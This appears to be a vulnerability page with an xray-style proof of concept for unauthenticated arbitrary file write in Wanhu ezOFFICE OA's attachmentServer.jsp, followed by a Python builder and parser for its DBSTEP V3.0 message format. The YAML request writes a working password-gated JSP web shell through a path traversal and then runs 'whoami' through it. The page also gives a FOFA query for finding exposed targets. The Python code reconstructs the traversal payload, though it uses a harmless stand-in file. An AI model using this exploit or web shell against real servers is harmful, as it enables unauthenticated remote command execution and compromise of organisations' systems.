Vulnerability description
The POST body is an iWebOffice DBSTEP V3.0 message. In its header line, 141 is the byte length of the key=value text section (which is what fixes where the server starts reading the file content), and 300 is the number of bytes of file content to read and write to disk. The text section in the request below is exactly 141 bytes when every line ends in CRLF; the header fields are fixed-width 16-byte columns, and copies of this request that collapse the padding to single spaces break those offsets. The traversal sits in FILETYPE (base64 of ../../upload/html/osias.jsp), which is why the JSP lands under /defaultroot/upload/html/ and can then be fetched directly.
FOFA fingerprint: app="万户网络-ezOFFICE" && port="7001"
id: wanhu-oa-attachmentserver-upload-file
info:
  name: Wanhu (万户) OA unauthenticated unconditional GETSHELL (attachmentServer.jsp arbitrary file write)
  author: d4m1ts
  severity: critical
  verified: true
  description: |
    The body is an iWebOffice DBSTEP V3.0 message. In the header line, 141 is the byte length of the
    key=value text section (so it fixes where the file content starts) and 300 is the number of bytes
    of file content to read. The header uses fixed-width 16-byte columns; keep the padding intact,
    otherwise the offsets no longer line up and the file is not written.
    FOFA: app="万户网络-ezOFFICE" && port="7001"
  reference:
    - https://rce.ink/index/view/318.go
set:
  hostname: request.url.host
rules:
  r0:
    request:
      raw: |
        POST /defaultroot/public/iWebOfficeSign/attachmentServer.jsp HTTP/1.1
        Host: {{hostname}}
        Content-Type: application/x-www-form-urlencoded

        DBSTEP V3.0     141             0               300             DBSTEP=REJTVEVQ
        OPTION=U0FWRUZJTEU=
        RECORDID=
        isDoc=dHJ1ZQ==
        moduleType=Z292ZG9jdW1lbnQ=
        FILETYPE={{base64("../../upload/html/osias.jsp")}}
        ABCCBANNNNN<% if("osias".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
    expression: true
  r1:
    request:
      method: GET
      path: /defaultroot/upload/html/osias.jsp?pwd=osias&i=whoami
    # The literal ABCCBANNNNN prefix is written to disk ahead of the JSP tags, so it echoes back
    # verbatim; <pre> only appears once the pwd check passed and the command ran.
    expression: response.status == 200 && response.body.bcontains(b'ABCCBANNNNN') && response.body.bcontains(b'<pre>')
expression: r0() && r1()
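The header arithmetic behind the 141 and 300 fields, as an added example that is not code from this page, from xray, or from the vendor: a small Python builder and parser for DBSTEP V3.0 messages that computes both length fields from the payload instead of hard-coding them. The 64-byte header layout (four left-aligned 16-byte columns: version, text-section length, a middle field the page's request sets to 0, file-section length) is an assumption taken from the padded header line; the page does not document the format. The field list reproduces the page's request, and the constructed stand-in file content is only there to make the script run offline.

```python
import base64

# Assumed layout (not documented on the page): a 64-byte header made of four
# left-aligned 16-byte columns -- version string, text-section length, a middle
# field the page's request sets to 0, and file-section length -- followed by the
# key=value text section and then the raw file content.
HEADER_LEN = 64
FIELD_WIDTH = 16
VERSION = "DBSTEP V3.0"


def encode_text_section(fields):
    """Serialise (key, value) pairs as KEY=base64(value) lines ending in CRLF.

    The first line is always DBSTEP=base64("DBSTEP"), as in the page's request.
    An empty value (RECORDID= on the page) is emitted with nothing after '='.
    """
    lines = ["DBSTEP=" + base64.b64encode(b"DBSTEP").decode()]
    for key, value in fields:
        encoded = base64.b64encode(value.encode()).decode() if value else ""
        lines.append(f"{key}={encoded}")
    return ("\r\n".join(lines) + "\r\n").encode()


def build_dbstep(fields, file_bytes, middle_field=0):
    """Return a complete message: 64-byte header + text section + file content."""
    text = encode_text_section(fields)
    header = (
        VERSION.ljust(FIELD_WIDTH)
        + str(len(text)).ljust(FIELD_WIDTH)
        + str(middle_field).ljust(FIELD_WIDTH)
        + str(len(file_bytes)).ljust(FIELD_WIDTH)
    ).encode("ascii")
    if len(header) != HEADER_LEN:
        raise ValueError("header must be exactly 64 bytes")
    return header + text + file_bytes


def parse_dbstep(message):
    """Split a message the way a receiver driven by the header lengths would.

    Returns (version, fields dict, file_bytes). Raises ValueError when the
    declared lengths run past the end of the message, which is the malformed
    input a receiver has to reject instead of reading out of bounds.
    """
    if len(message) < HEADER_LEN:
        raise ValueError("truncated header")
    header = message[:HEADER_LEN].decode("ascii")
    version = header[0:16].strip()
    text_len = int(header[16:32])
    file_len = int(header[48:64])
    end_of_text = HEADER_LEN + text_len
    end_of_file = end_of_text + file_len
    if end_of_file > len(message):
        raise ValueError("declared lengths exceed message size")
    fields = {}
    for line in message[HEADER_LEN:end_of_text].decode("ascii").split("\r\n"):
        if not line:
            continue
        key, _, value = line.partition("=")
        fields[key] = base64.b64decode(value).decode() if value else ""
    return version, fields, message[end_of_text:end_of_file]


# The page's field order and values; FILETYPE carries the path traversal.
PAGE_FIELDS = [
    ("OPTION", "SAVEFILE"),
    ("RECORDID", ""),
    ("isDoc", "true"),
    ("moduleType", "govdocument"),
    ("FILETYPE", "../../upload/html/osias.jsp"),
]


def page_text_section_length():
    """Byte length of the page's text section; this is the 141 in its header."""
    return len(encode_text_section(PAGE_FIELDS))


def file_section_offset(message):
    """Offset into the body at which the file content starts (64 + text length)."""
    return HEADER_LEN + int(message[16:32].decode("ascii"))


if __name__ == "__main__":
    stand_in = b"ABCCBANNNNN<% out.print(1); %>"  # constructed, not the page's shell
    msg = build_dbstep(PAGE_FIELDS, stand_in)
    print(repr(msg[:HEADER_LEN].decode("ascii")))
    print("text section bytes:", page_text_section_length())
    print("file content starts at byte:", file_section_offset(msg))
    print(parse_dbstep(msg))
```

The builder shows why the 141 only holds with CRLF line endings: a client that sends the same lines with bare LF produces a 135-byte text section, the server still skips 141 bytes, and the first six bytes of the JSP are lost. The parser's length check is the guard a receiving implementation needs, since the header lengths are attacker-controlled.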